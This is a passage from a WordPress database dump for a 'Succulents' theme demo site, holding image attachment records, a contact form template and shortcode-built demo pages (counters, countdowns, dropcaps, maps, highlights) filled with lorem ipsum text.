15:32:44','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/succulents-logo.jpg',0,'attachment','image/jpeg',0),(2438,1,'2018-02-08 13:08:01','2018-02-08 13:08:01','','t2','','inherit','open','closed','','t2-2','','','2018-02-08 13:08:01','2018-02-08 13:08:01','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/t2.jpg',0,'attachment','image/jpeg',0),(2440,1,'2018-02-08 13:12:12','2018-02-08 13:12:12','','h10-slide3-testimonials','','inherit','open','closed','','h10-slide3-testimonials','','','2018-02-08 13:12:12','2018-02-08 13:12:12','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h10-slide3-testimonials.png',0,'attachment','image/png',0),(2446,1,'2018-02-08 13:29:41','2018-02-08 13:29:41','','author-img-1','','inherit','open','closed','','author-img-1','','','2018-02-08 13:29:41','2018-02-08 13:29:41','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/author-img-1.png',0,'attachment','image/png',0),(2447,1,'2018-02-08 13:29:43','2018-02-08 13:29:43','','author-img-2','','inherit','open','closed','','author-img-2','','','2018-02-08 13:29:43','2018-02-08 13:29:43','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/author-img-2.png',0,'attachment','image/png',0),(2448,1,'2018-02-08 13:29:44','2018-02-08 13:29:44','','author-img-3','','inherit','open','closed','','author-img-3','','','2018-02-08 13:29:44','2018-02-08 13:29:44','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/author-img-3.png',0,'attachment','image/png',0),(2460,1,'2018-02-08 14:06:34','2018-02-08 14:06:34','','slide4','','inherit','open','closed','','slide4','','','2018-02-08 14:06:34','2018-02-08 14:06:34','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/slide4.jpg',0,'attachment','image/jpeg',0),(2473,1,'2018-02-09 09:34:35','2018-02-09 09:34:35','','product-9','','inherit','open','closed','','product-9','','','2018-02-09 09:34:35','2018-02-09 09:34:35','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product-9.jpg',0,'attachment','image/jpeg',0),(2474,1,'2018-02-09 09:35:11','2018-02-09 09:35:11','','product-10','','inherit','open','closed','','product-10','','','2018-02-09 09:35:11','2018-02-09 09:35:11','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product-10.jpg',0,'attachment','image/jpeg',0),(2475,1,'2018-02-09 09:36:04','2018-02-09 09:36:04','','product-11','','inherit','open','closed','','product-11','','','2018-02-09 09:36:04','2018-02-09 09:36:04','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product-11.jpg',0,'attachment','image/jpeg',0),(2476,1,'2018-02-09 09:36:40','2018-02-09 09:36:40','','product-12','','inherit','open','closed','','product-12','','','2018-02-09 09:36:40','2018-02-09 09:36:40','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product-12.jpg',0,'attachment','image/jpeg',0),(2477,1,'2018-02-09 09:37:33','2018-02-09 09:37:33','','product-13','','inherit','open','closed','','product-13','','','2018-02-09 09:37:33','2018-02-09 09:37:33','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product-13.jpg',0,'attachment','image/jpeg',0),(2478,1,'2018-02-09 09:38:03','2018-02-09 09:38:03','','product-14','','inherit','open','closed','','product-14','','','2018-02-09 09:38:03','2018-02-09 09:38:03','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product-14.jpg',0,'attachment','image/jpeg',0),(2479,1,'2018-02-09 09:38:52','2018-02-09 09:38:52','','product-15','','inherit','open','closed','','product-15','','','2018-02-09 09:38:52','2018-02-09 09:38:52','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product-15.jpg',0,'attachment','image/jpeg',0),(2480,1,'2018-02-09 09:39:14','2018-02-09 09:39:14','','product15-gallery1','','inherit','open','closed','','product15-gallery1','','','2018-02-09 09:39:14','2018-02-09 09:39:14','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product15-gallery1.jpg',0,'attachment','image/jpeg',0),(2481,1,'2018-02-09 09:39:17','2018-02-09 09:39:17','','product15-gallery2','','inherit','open','closed','','product15-gallery2','','','2018-02-09 09:39:17','2018-02-09 09:39:17','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product15-gallery2.jpg',0,'attachment','image/jpeg',0),(2482,1,'2018-02-09 09:39:18','2018-02-09 09:39:18','','product15-gallery3','','inherit','open','closed','','product15-gallery3','','','2018-02-09 09:39:18','2018-02-09 09:39:18','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product15-gallery3.jpg',0,'attachment','image/jpeg',0),(2483,1,'2018-02-09 09:39:53','2018-02-09 09:39:53','','product-16','','inherit','open','closed','','product-16','','','2018-02-09 09:39:53','2018-02-09 09:39:53','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product-16.jpg',0,'attachment','image/jpeg',0),(2484,1,'2018-02-09 09:40:15','2018-02-09 09:40:15','','product16-gallery1','','inherit','open','closed','','product16-gallery1','','','2018-02-09 09:40:15','2018-02-09 09:40:15','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product16-gallery1.jpg',0,'attachment','image/jpeg',0),(2485,1,'2018-02-09 09:40:17','2018-02-09 09:40:17','','product16-gallery2','','inherit','open','closed','','product16-gallery2','','','2018-02-09 09:40:17','2018-02-09 09:40:17','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product16-gallery2.jpg',0,'attachment','image/jpeg',0),(2486,1,'2018-02-09 09:40:19','2018-02-09 09:40:19','','product16-gallery3','','inherit','open','closed','','product16-gallery3','','','2018-02-09 09:40:19','2018-02-09 09:40:19','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product16-gallery3.jpg',0,'attachment','image/jpeg',0),(2495,1,'2018-02-09 11:07:56','2018-02-09 11:07:56','
\n[textarea textarea-286 \"Message\"][text text-761 placeholder \"Name\"][email email-107 placeholder \"Email\"]\n[submit \"send\"]\n
\n1\nSucculents \"[your-subject]\"\n[your-name] \nsucculents@select-themes.com\nFrom: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Succulents (http://succulents.select-themes.com)\nReply-To: [your-email]\n\n\n\n\nSucculents \"[your-subject]\"\nSucculents \n[your-email]\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Succulents (http://succulents.select-themes.com)\nReply-To: succulents@select-themes.com\n\n\n\nThank you for your message. It has been sent.\nThere was an error trying to send your message. Please try again later.\nOne or more fields have an error. Please check and try again.\nThere was an error trying to send your message. Please try again later.\nYou must accept the terms and conditions before sending your message.\nThe field is required.\nThe field is too long.\nThe field is too short.\nThe date format is incorrect.\nThe date is before the earliest one allowed.\nThe date is after the latest one allowed.\nThere was an unknown error uploading the file.\nYou are not allowed to upload files of this type.\nThe file is too big.\nThere was an error uploading the file.\nThe number format is invalid.\nThe number is smaller than the minimum allowed.\nThe number is larger than the maximum allowed.\nThe answer to the quiz is incorrect.\nYour entered code is incorrect.\nThe e-mail address entered is invalid.\nThe URL is invalid.\nThe telephone number is invalid.','Contact Form 2','','publish','closed','closed','','contact-form-2','','','2018-02-09 11:07:56','2018-02-09 11:07:56','',0,'http://succulents.select-themes.com/?post_type=wpcf7_contact_form&p=2495',0,'wpcf7_contact_form','',0),(2508,1,'2018-02-09 11:48:04','2018-02-09 11:48:04','','h2-img-1','','inherit','open','closed','','h2-img-1','','','2018-02-09 11:48:04','2018-02-09 11:48:04','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h2-img-1.jpg',0,'attachment','image/jpeg',0),(2509,1,'2018-02-09 11:48:05','2018-02-09 11:48:05','','h2-img-2','','inherit','open','closed','','h2-img-2','','','2018-02-09 11:48:05','2018-02-09 11:48:05','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h2-img-2.jpg',0,'attachment','image/jpeg',0),(2510,1,'2018-02-09 11:48:07','2018-02-09 11:48:07','','h2-img-3','','inherit','open','closed','','h2-img-3','','','2018-02-09 11:48:07','2018-02-09 11:48:07','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h2-img-3.jpg',0,'attachment','image/jpeg',0),(2514,1,'2018-02-09 11:57:43','2018-02-09 11:57:43','','back-pear','','inherit','open','closed','','back-pear-2','','','2018-02-09 11:57:43','2018-02-09 11:57:43','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/back-pear.jpg',0,'attachment','image/jpeg',0),(2515,1,'2018-02-09 12:31:33','2018-02-09 12:31:33','','pozadina 1','','inherit','open','closed','','pozadina-1','','','2018-02-09 12:31:33','2018-02-09 12:31:33','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/pozadina-1.jpg',0,'attachment','image/jpeg',0),(2516,1,'2018-02-09 12:36:34','2018-02-09 12:36:34','','h3-slide2-graphic5','','inherit','open','closed','','h3-slide2-graphic5','','','2018-02-09 12:36:34','2018-02-09 12:36:34','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide2-graphic5.png',0,'attachment','image/png',0),(2517,1,'2018-02-09 12:37:04','2018-02-09 12:37:04','','h3-slide2-graphic3','','inherit','open','closed','','h3-slide2-graphic3','','','2018-02-09 12:37:04','2018-02-09 12:37:04','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide2-graphic3.png',0,'attachment','image/png',0),(2518,1,'2018-02-09 12:37:26','2018-02-09 12:37:26','','h3-slide2-graphic1','','inherit','open','closed','','h3-slide2-graphic1','','','2018-02-09 12:37:26','2018-02-09 12:37:26','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide2-graphic1.png',0,'attachment','image/png',0),(2521,1,'2018-02-09 13:16:31','2018-02-09 13:16:31','','h3-slide3-graphic2','','inherit','open','closed','','h3-slide3-graphic2','','','2018-02-09 13:16:31','2018-02-09 13:16:31','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide3-graphic2.png',0,'attachment','image/png',0),(2522,1,'2018-02-09 13:20:13','2018-02-09 13:20:13','','h3-slide2-graphic6','','inherit','open','closed','','h3-slide2-graphic6','','','2018-02-09 13:20:13','2018-02-09 13:20:13','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide2-graphic6.png',0,'attachment','image/png',0),(2524,1,'2018-02-09 13:35:41','2018-02-09 13:35:41','','h3-slide2-graphic11','','inherit','open','closed','','h3-slide2-graphic11','','','2018-02-09 13:35:41','2018-02-09 13:35:41','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide2-graphic11.png',0,'attachment','image/png',0),(2533,1,'2018-02-09 14:30:24','2018-02-09 14:30:24','','succulents-logo-veliki','','inherit','open','closed','','succulents-logo-veliki','','','2018-02-09 14:30:24','2018-02-09 14:30:24','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/succulents-logo-veliki.png',0,'attachment','image/png',0),(2536,1,'2018-02-09 14:53:17','2018-02-09 14:53:17','','h3-slide2-graphic7','','inherit','open','closed','','h3-slide2-graphic7','','','2018-02-09 14:53:17','2018-02-09 14:53:17','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide2-graphic7.png',0,'attachment','image/png',0),(2537,1,'2018-02-09 15:02:22','2018-02-09 15:02:22','','back-papaya','','inherit','open','closed','','back-papaya','','','2018-02-09 15:02:22','2018-02-09 15:02:22','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/back-papaya.jpg',0,'attachment','image/jpeg',0),(2538,1,'2018-02-09 15:02:48','2018-02-09 15:02:48','','h2-slide3-graphic-1','','inherit','open','closed','','h2-slide3-graphic-1','','','2018-02-09 15:02:48','2018-02-09 15:02:48','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h2-slide3-graphic-1.png',0,'attachment','image/png',0),(2539,1,'2018-02-09 15:02:51','2018-02-09 15:02:51','','h2-slide3-graphic-2','','inherit','open','closed','','h2-slide3-graphic-2','','','2018-02-09 15:02:51','2018-02-09 15:02:51','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h2-slide3-graphic-2.png',0,'attachment','image/png',0),(2540,1,'2018-02-09 15:02:54','2018-02-09 15:02:54','','h2-slide3-graphic-3','','inherit','open','closed','','h2-slide3-graphic-3','','','2018-02-09 15:02:54','2018-02-09 15:02:54','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h2-slide3-graphic-3.png',0,'attachment','image/png',0),(2541,1,'2018-02-09 15:02:56','2018-02-09 15:02:56','','h2-slide3-graphic-4','','inherit','open','closed','','h2-slide3-graphic-4','','','2018-02-09 15:02:56','2018-02-09 15:02:56','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h2-slide3-graphic-4.png',0,'attachment','image/png',0),(2542,1,'2018-02-09 15:02:57','2018-02-09 15:02:57','','h2-slide3-graphic-5','','inherit','open','closed','','h2-slide3-graphic-5','','','2018-02-09 15:02:57','2018-02-09 15:02:57','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h2-slide3-graphic-5.png',0,'attachment','image/png',0),(2544,1,'2018-02-09 15:04:07','2018-02-09 15:04:07','','h3-slide3-graphic1','','inherit','open','closed','','h3-slide3-graphic1','','','2018-02-09 15:04:07','2018-02-09 15:04:07','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide3-graphic1.png',0,'attachment','image/png',0),(2566,1,'2018-02-12 08:55:11','2018-02-12 08:55:11','[vc_row row_content_width=\"grid\" content_width=\"grid\" css=\".vc_custom_1521032142633{padding-top: 91px !important;padding-bottom: 94px !important;}\" simple_background_color=\"#ffffff\"][vc_column][qodef_countdown skin=\"\" year=\"2019\" month=\"1\" day=\"7\" hour=\"10\" minute=\"16\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_width=\"grid\" css=\".vc_custom_1519228478941{padding-top: 121px !important;padding-bottom: 124px !important;}\" simple_background_color=\"#f6f6f6\" parallax_background_image=\"369\"][vc_column][qodef_countdown skin=\"qodef-light-skin\" year=\"2019\" month=\"9\" day=\"6\" hour=\"4\" minute=\"16\"][/vc_column][/vc_row]','Countdown','','publish','closed','closed','','countdown','','','2018-02-12 08:55:11','2018-02-12 08:55:11','',1336,'http://succulents.select-themes.com/?page_id=2566',0,'page','',0),(2577,1,'2018-02-12 09:29:06','2018-02-12 09:29:06','[vc_row row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1521032229394{padding-top: 90px !important;padding-bottom: 55px !important;}\"][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_counter type=\"qodef-zero-counter\" title_tag=\"h3\" title_font_weight=\"\" digit=\"35\" digit_font_size=\"60\" title=\"Organic \"][vc_empty_space height=\"40px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_counter type=\"qodef-zero-counter\" title_tag=\"h3\" title_font_weight=\"\" digit=\"67\" digit_font_size=\"60\" title=\"Smoothie\"][vc_empty_space height=\"40px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_counter type=\"qodef-zero-counter\" title_tag=\"h3\" title_font_weight=\"\" digit=\"43\" digit_font_size=\"60\" title=\"Vegan\"][vc_empty_space height=\"40px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_counter type=\"qodef-zero-counter\" title_tag=\"h3\" title_font_weight=\"\" digit=\"91\" digit_font_size=\"60\" title=\"Diet\"][vc_empty_space height=\"40px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1521032241419{padding-top: 90px !important;padding-bottom: 55px !important;}\" simple_background_color=\"#f6f6f6\"][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_counter type=\"qodef-zero-counter\" title_tag=\"h3\" title_font_weight=\"\" digit=\"35\" digit_font_size=\"60\" title=\"Organic \"][vc_empty_space height=\"40px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_counter type=\"qodef-zero-counter\" title_tag=\"h3\" title_font_weight=\"\" digit=\"67\" digit_font_size=\"60\" title=\"Smoothie\"][vc_empty_space height=\"40px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_counter type=\"qodef-zero-counter\" title_tag=\"h3\" title_font_weight=\"\" digit=\"43\" digit_font_size=\"60\" title=\"Vegan\"][vc_empty_space height=\"40px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_counter type=\"qodef-zero-counter\" title_tag=\"h3\" title_font_weight=\"\" digit=\"91\" digit_font_size=\"60\" title=\"Diet\"][vc_empty_space height=\"40px\"][/vc_column][/vc_row]','Counters','','publish','closed','closed','','counters','','','2018-02-12 09:29:06','2018-02-12 09:29:06','',1336,'http://succulents.select-themes.com/?page_id=2577',0,'page','',0),(2592,1,'2018-02-12 09:58:51','2018-02-12 09:58:51','','h3-slide2-graphic2','','inherit','open','closed','','h3-slide2-graphic2','','','2018-02-12 09:58:51','2018-02-12 09:58:51','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide2-graphic2.png',0,'attachment','image/png',0),(2593,1,'2018-02-12 10:08:50','2018-02-12 10:08:50','[vc_row row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1521033703747{padding-top: 56px !important;padding-bottom: 76px !important;}\"][vc_column][qodef_custom_font title_tag=\"\" font_weight=\"\" subtitle_font_weight=\"\" font_style=\"\" text_transform=\"\" text_decoration=\"\" text_align=\"\" title=\"600+\" font_family=\"Quicksand\" font_size=\"80\" color=\"#ffbea5\"][qodef_custom_font title_tag=\"\" font_weight=\"\" subtitle_font_weight=\"\" font_style=\"\" text_transform=\"\" text_decoration=\"\" text_align=\"\" title=\"GOOGLE FONTS TO CHOOSE FROM\" font_family=\"Roboto\" font_size=\"25px\" line_height=\"43px\"][qodef_custom_font title_tag=\"\" font_weight=\"\" subtitle_font_weight=\"\" font_style=\"\" text_transform=\"\" text_decoration=\"\" text_align=\"\" title=\"Choose Your Font From The Google Collection\" font_family=\"Montserrat\" font_size=\"40px\" line_height=\"43px\" color=\"#ffbea5\"][qodef_custom_font title_tag=\"\" font_weight=\"\" subtitle_font_weight=\"\" font_style=\"italic\" text_transform=\"\" text_decoration=\"\" text_align=\"\" title=\"Choose Your Font From The Google Collection\" font_family=\"catamaran\" font_size=\"30px\" line_height=\"43px\"][qodef_custom_font title_tag=\"\" font_weight=\"\" subtitle_font_weight=\"\" font_style=\"\" text_transform=\"\" text_decoration=\"\" text_align=\"\" title=\" RELEASE YOUR CREATIVITY WITH THIS THEME’S AMAZING DESIGN\" font_family=\"source sans pro\" font_size=\"23px\" line_height=\"43px\" color=\"#999999\"][qodef_custom_font title_tag=\"\" font_weight=\"\" subtitle_font_weight=\"\" font_style=\"\" text_transform=\"\" text_decoration=\"\" text_align=\"\" title=\"CUSTOM FONT FAMILY & SIZE\" font_family=\"playfair display\" font_size=\"18px\" line_height=\"43px\"][/vc_column][/vc_row]','Custom Font','','publish','closed','closed','','custom-font','','','2018-02-12 10:08:50','2018-02-12 10:08:50','',1336,'http://succulents.select-themes.com/?page_id=2593',0,'page','',0),(2611,1,'2018-02-12 10:30:11','2018-02-12 10:30:11','[vc_row row_content_width=\"grid\" content_width=\"grid\" css=\".vc_custom_1521033788363{padding-top: 83px !important;}\"][vc_column offset=\"vc_col-lg-6 vc_col-md-6\"][vc_column_text][qodef_dropcaps type=\"square\" color=\"#ffffff\" background_color=\"#ffbea5\"]V[/qodef_dropcaps]rem ipsum dolor. Sit amet non. Libero varius ligula a id nec libero amet non metus ligula risus egestas senectus euismod. In vel tristique. Nullaki risus aliquam venenatis ut feugiat. Suspendisse nec ultricies. Pulvinar fusce varius consequat quis ornare. Tellus ridiculus quisque. Ullamcorper pulvinar pede. Sem porta sit nibh vivamus et. Aenean sollicitu din in elit sed id. Justo et netus tempus cras quam. Ac urna pellentesque vitae posuere libero. Con sed suspendisse tristi que nisl magna nulla felis placerat quis lacus assumenda auctor.[/vc_column_text][vc_empty_space height=\"50px\"][/vc_column][vc_column offset=\"vc_col-lg-6 vc_col-md-6\"][vc_column_text][qodef_dropcaps type=\"square\" color=\"#ffffff\" background_color=\"#3c3c3c\"]V[/qodef_dropcaps]rem ipsum dolor. Sit amet non. Libero varius ligula a id nec libero amet non metus ligula risus egestas senectus euismod. In vel tristique. Nullaki risus aliquam venenatis ut feugiat. Suspendisse nec ultricies. Pulvinar fusce varius consequat quis ornare. Tellus ridiculus quisque. Ullamcorper pulvinar pede. Sem porta sit nibh vivamus et. Aenean sollicitu din in elit sed id. Justo et netus tempus cras quam. Ac urna pellentesque vitae posuere libero. Con sed suspendisse tristi que nisl magna nulla felis placerat quis lacus assumenda auctor.[/vc_column_text][vc_empty_space height=\"50px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_width=\"grid\"][vc_column offset=\"vc_col-lg-6 vc_col-md-6\"][vc_column_text][qodef_dropcaps type=\"circle\" color=\"#ffffff\" background_color=\"#ffbea5\"]V[/qodef_dropcaps] ibero varius ligula a id nec libero amet non metus ligula risus egestas senectus euismod. In vel tristique. Nulla risus aliquam venenatis ut feuji giat. Suspendisse nec ultricies. Frem ipsum dolor. Sit amet non. Pulvinar fuscenu varius consequat quis ornare. Tellus ridiculus quisque. Ullamcorper pulvinar ped. Sem porta sit nibh vivamus et. Aenean sollicitu din in elit sed id. Justo et netus su temp us cras quam. Ac urna pellentesque vitae posuere libero. Con sed suspen tristique nisl magna nulla felis placerat quis lacus assumenda auctor.[/vc_column_text][vc_empty_space height=\"50px\"][/vc_column][vc_column offset=\"vc_col-lg-6 vc_col-md-6\"][vc_column_text][qodef_dropcaps type=\"circle\" color=\"#ffffff\" background_color=\"#3c3c3c\"]V[/qodef_dropcaps] ibero varius ligula a id nec libero amet non metus ligula risus egestas senectus euismod. In vel tristique. Nulla risus aliquam venenatis ut feuji giat. Suspendisse nec ultricies. Frem ipsum dolor. Sit amet non. Pulvinar fuscenu varius consequat quis ornare. Tellus ridiculus quisque. Ullamcorper pulvinar ped. Sem porta sit nibh vivamus et. Aenean sollicitu din in elit sed id. Justo et netus su temp us cras quam. Ac urna pellentesque vitae posuere libero. Con sed suspen tristique nisl magna nulla felis placerat quis lacus assumenda auctor.[/vc_column_text][vc_empty_space height=\"50px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_width=\"grid\" css=\".vc_custom_1521033801282{padding-bottom: 44px !important;}\"][vc_column offset=\"vc_col-lg-6 vc_col-md-6\"][vc_column_text][qodef_dropcaps type=\"normal\" color=\"#ffbea5\" background_color=\"\"]V[/qodef_dropcaps] llamcorper pulvinar pede. Sem porta sit nibh vivamus et. Aenean une doler sollicitudin in elit sed id. Justo et netus tempus cras quam. Ac urna pellentesque vitae posuere libero. Con sed suspendisse tristique nisl magna nulla felis placerat quis lacus assumenda auctor. Frem ipsum dolor. Sit amet non. Liber varius ligula a id nec liber amet non metus ligula risus egestas senectus euismod. In vel tristique. Nulla risus aliquam venenatis ut feugiat. Suspendisse nec ultricies. Pulvinar fusce varius consequ quis ornare. Tellus ridiculus quisque.[/vc_column_text][vc_empty_space height=\"50px\"][/vc_column][vc_column offset=\"vc_col-lg-6 vc_col-md-6\"][vc_column_text][qodef_dropcaps type=\"normal\" color=\"#3c3c3c\" background_color=\"\"]V[/qodef_dropcaps] llamcorper pulvinar pede. Sem porta sit nibh vivamus et. Aenean une doler sollicitudin in elit sed id. Justo et netus tempus cras quam. Ac urna pellentesque vitae posuere libero. Con sed suspendisse tristique nisl magna nulla felis placerat quis lacus assumenda auctor. Frem ipsum dolor. Sit amet non. Liber varius ligula a id nec liber amet non metus ligula risus egestas senectus euismod. In vel tristique. Nulla risus aliquam venenatis ut feugiat. Suspendisse nec ultricies. Pulvinar fusce varius consequ quis ornare. Tellus ridiculus quisque.[/vc_column_text][vc_empty_space height=\"50px\"][/vc_column][/vc_row]','Dropcaps','','publish','closed','closed','','dropcaps','','','2018-02-12 10:30:11','2018-02-12 10:30:11','',1336,'http://succulents.select-themes.com/?page_id=2611',0,'page','',0),(2612,1,'2018-02-12 10:26:40','2018-02-12 10:26:40','','h3-slide2-graphic8','','inherit','open','closed','','h3-slide2-graphic8','','','2018-02-12 10:26:40','2018-02-12 10:26:40','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide2-graphic8.png',0,'attachment','image/png',0),(2613,1,'2018-02-12 10:26:42','2018-02-12 10:26:42','','h3-slide2-graphic9','','inherit','open','closed','','h3-slide2-graphic9','','','2018-02-12 10:26:42','2018-02-12 10:26:42','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide2-graphic9.png',0,'attachment','image/png',0),(2620,1,'2018-02-12 10:48:19','2018-02-12 10:48:19','[vc_row row_content_width=\"grid\" css=\".vc_custom_1521032341492{padding-top: 100px !important;padding-bottom: 100px !important;}\"][vc_column width=\"1/2\"][qodef_google_map custom_map_style=\"yes\" address1=\"53 Dekalb Ave, New York\" zoom=\"12\" color_overlay=\"#000000\" lightness=\"20\" map_height=\"354px\" pin=\"541\"][/vc_column][vc_column width=\"1/2\"][qodef_google_map custom_map_style=\"yes\" address1=\"152 Jan Evertsenstraat, Amsterdam\" zoom=\"12\" color_overlay=\"#000000\" lightness=\"20\" map_height=\"354px\" pin=\"541\"][/vc_column][/vc_row][vc_row][vc_column][qodef_google_map custom_map_style=\"yes\" address1=\"203 Newington Causeway, London\" zoom=\"12\" color_overlay=\"#000000\" lightness=\"20\" map_height=\"500px\" pin=\"541\"][/vc_column][/vc_row]','Google Maps','','publish','closed','closed','','google-maps','','','2018-02-12 10:48:19','2018-02-12 10:48:19','',1336,'http://succulents.select-themes.com/?page_id=2620',0,'page','',0),(2630,1,'2018-02-12 10:59:01','2018-02-12 10:59:01','[vc_row row_content_width=\"grid\" content_width=\"grid\" css=\".vc_custom_1521033929360{padding-top: 80px !important;padding-bottom: 52px !important;}\"][vc_column][vc_column_text]Alienum phaedrum torquatos nec eu, vis detraxit periculis ex, nihil expetendis in mei. Mei  hutyr an pericula euripidis, hinc partem ei est. [qodef_highlight background_color=\"#ffbea5\" color=\"#ffffff\"]Eos ei nisl graecis, vix aperiri consequat an.[/qodef_highlight] Alienum phaedrum torquatos nec eu, vis detraxit periculis ex, nihil expetendis in mei. Eius lorem tincidunt vix at, vel pertinax sensibus id, error epicurei mea et. Mei facilisis urbanitas moderatius id. Vis ei rationibus definiebas, eu qui purto zril laoreet. Ex error omnium interpretaris pro, error vim pericula euripidis. Mei an pericula euripidis, hinc partem ei est.Eos ei nisl graecis, vixlorem aperiri consequat an Eius lorem tincidunt vix at, vel pertinax sensibus id, error epicurei mea et. Me facilisis urbanitas moderatius id. Vis ei rationibus definiebas, eu qui purto zril laoreet. [qodef_highlight background_color=\"#ffbea5\" color=\"#ffffff\"]Ex error omnium interpretaris pro, alia illum ea vim pericula.[/qodef_highlight][/vc_column_text][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_width=\"grid\" css=\".vc_custom_1514474729617{padding-bottom: 52px !important;}\"][vc_column][vc_column_text]Alienum phaedrum torquatos nec eu, vis detraxit periculis ex, nihil expetendis in mei. [qodef_highlight background_color=\"#f6f6f6\" color=\"\"]Mei hutyr an pericula euripidis, hinc partem ei est.[/qodef_highlight] Eos ei nisl graecis, vix aperiri consequat an. Eius lorem tincidunt vix at, vel pertinax sensibus id, error epicurei mea et. Mei an pericula euripidis, hinc partem ei est.Eos ei nisl graecis, vixlorem aperiri consequat an. Mea facilisis urbanitas moderatius id. Vis ei rationibus definiebas, eu qui purto zril laoreet. Eos ei nisl graecis, vixlorem aperiri consequat an. Mea facilisis urbanitas moderatius conseid ei. Ex error omnium interpretaris pro, alia illum ea vim pericula euripidis. [qodef_highlight background_color=\"#f6f6f6\" color=\"\"]Mei an pericula euripidis, hinc partem ei est. Eos ei nisl graecis, vixlorem aperiri consequat an. Eius lorem tincidunt vix at, vel pertinax sensibus id, error epicurei mea et.[/qodef_highlight] Me facilisis urbanitas moderatius id. Vis ei ration bus definiebas, eu qui purto zril laoret. Ex error omnium interpretaris pro, alia illum ea vim pericula euripidis.[/vc_column_text][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_width=\"grid\" css=\".vc_custom_1521033943753{padding-bottom: 92px !important;}\"][vc_column][vc_column_text]Alienum phaedrum torquatos nec eu, vis detraxit periculis ex, nihil expetendis in mei. [qodef_highlight background_color=\"#000000\" color=\"#ffffff\"]Mei hutyr an pericula euripidis, hinc partem ei est.[/qodef_highlight] Eos ei nisl graecis, vix aperiri consequat an. Eius lorem tincidunt vix at, vel pertinax sensibus id, error epicurei mea et. Mea facilisis urbanitas moderatius id. Vis ei rationibus definiebas, eu qui purto zril laoreet. Ex error omnium interpretaris pro, error vim pericula euripidis. [qodef_highlight background_color=\"#000000\" color=\"#ffffff\"]Alienum phaedrum torquatos nec eu, vis detraxit periculis ex, 